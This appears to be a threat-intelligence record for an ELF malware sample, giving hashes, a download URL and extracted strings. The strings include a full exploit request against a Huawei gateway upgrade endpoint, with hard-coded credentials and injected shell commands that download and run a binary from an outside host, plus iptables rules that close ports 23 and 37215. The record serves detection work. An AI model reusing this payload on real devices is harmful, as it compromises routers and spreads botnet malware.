Sample details: cefa1b0088aa8d94ca707cf44d030875

Hashes
MD5: cefa1b0088aa8d94ca707cf44d030875
SHA1: 229024753dbdd31a3d95f459fdefc13ad90372d1
SHA256: 810cb8ba85a423c457f97d29b1c68c54d7886d35ba67d2cc79c867a29efd3605
SSDEEP: 1536:yVAO4Qi4iWgkF9JF84tFiMQtXZK5PcijJw:yVAEQWgkF9AtX6q
Details
File Type: ELF
Yara Hits: (none listed)
Source
http://185.62.190.159/bins/mpsl.idopoc
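Strings
[Note: the lines below are printable strings extracted from the sample, reproduced verbatim. Relevant for detection: the embedded HTTP POST to /ctrlt/DeviceUpgrade_1 carries shell command substitution ($(...)) inside the SOAP NewStatusURL and NewDownloadURL fields, and the two iptables rules drop inbound TCP traffic to ports 23 and 37215.]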
		$,%$&!(
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
/bin/sh
/dev/null
.shstrtab
.rodata
.ctors
.dtors
.data.rel.ro
.mdebug.abi32